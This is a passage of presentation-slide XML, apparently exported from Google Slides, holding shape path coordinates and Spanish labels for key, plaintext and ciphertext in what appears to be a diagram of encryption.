                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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468194" y="1160338"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253503" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313320" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759461" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807520" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847556" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013537" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254091"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206031"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007061" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979682" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953799" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921593" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807694" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760049" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="370023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661453" y="376086"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="313309" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="3700232" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3760043" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807686" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847572" y="6477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3998192" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="206030"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="254086"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="314702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013542" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4013302" y="2126323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4011623" y="2173966"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4007066" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3979681" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3953795" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3921588" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884112" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3807512" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3759455" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3698840" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="2379822"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="253499" y="2379582"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205856" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165970" y="2373346"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15353" y="2250392"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2065120"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313309"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="239" y="253499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1919" y="205856"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6477" y="165970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33863" y="91952"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59746" y="59746"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91952" y="33863"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15353"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206030" y="1919"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254086" y="239"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="314702" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="313309" y="0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Google Shape;206;p17"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4651581" y="729613"/>
            <a:ext cx="864300" cy="0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7" name="Google Shape;207;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2076906" y="214350"/>
            <a:ext cx="26073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400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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s" sz="24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Llave   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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s" sz="24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Texto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Plano</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="FFFF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8" name="Google Shape;208;p17"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4294967295" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5458900" y="532200"/>
            <a:ext cx="30237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400">
                <a:solidFill>
                  <a:schemeClr val="dk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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="0000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Texto Cifrado</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2400">
                <a:solidFill>
                  <a:schemeClr val="dk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9" name="Google Shape;209;p17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="4130450" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7228" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7237" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17140" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37801" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66692" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102642" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196565" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250210" y="2844325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294903" y="2839237"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="2808666"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="2779775"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472964" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480182" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472955" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442395" y="102642"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413500" y="66692"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377547" y="37801"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17140"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294927" y="7231"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250404" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197219" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41304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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7219502" y="3811364"/>
            <a:ext cx="1332967" cy="846894"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2846704" w="4480560">
                <a:moveTo>
                  <a:pt x="349738" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4130450" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4197217" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250400" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294923" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="185289"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="229982"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="283628"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="351298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4480188" y="2496730"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4479920" y="2563498"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4478046" y="2616680"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4472961" y="2661203"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4463057" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4442391" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4413496" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4377545" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4335710" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4294899" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4250206" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4196564" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4128900" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="2846468"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="282970" y="2846200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229787" y="2844327"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185264" y="2839241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="2829337"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="2808671"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="2779776"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="2743825"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="2701991"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="2661179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="2616487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="2562844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="2495180"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="349738"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="267" y="282970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142" y="229787"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7230" y="185264"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17138" y="144477"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37800" y="102643"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66693" y="66693"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102643" y="37800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="144477" y="17138"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185289" y="7230"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="229982" y="2142"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="283628" y="267"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="351298" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349738" y="0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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="5163947" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="139377" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7106" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26893" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57065" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95325" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296220" y="95325"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276435" y="57065"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246264" y="26893"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5208003" y="7106"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7098008" y="4665538"/>
            <a:ext cx="1577797" cy="82933"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="278765" w="5303520">
                <a:moveTo>
                  <a:pt x="139377" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="5163947" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5303325" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5296219" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5276432" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5246260" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5207999" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5163947" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="278755"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="271649"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="251862"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="221690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="183430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="139377"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="7105" y="95323"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26891" y="57062"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="57062" y="26891"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95323" y="7105"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="139377" y="0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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7288431" y="3881286"/>
            <a:ext cx="1194116" cy="708044"/>
          </a:xfrm>
          <a:custGeom>
            <a:rect b="b" l="l" r="r" t="t"/>
            <a:pathLst>
              <a:path extrusionOk="0" h="2379979" w="4013835">
                <a:moveTo>
                  <a:pt x="3700232" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="314712" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254091" y="240"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="206031" y="1920"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="165992" y="6480"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="15360"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="33865"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="59748"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="91954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="15360" y="129430"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="205857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="253503"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="313320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5" y="2066512"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="240" y="2125735"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1920" y="2173792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="6485" y="2213852"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="33865" y="2287868"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59748" y="2320075"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91954" y="2345961"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="129430" y="2364472"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205857" y="2377904"/>
                </a:lnTo>
                <a:lnTo>
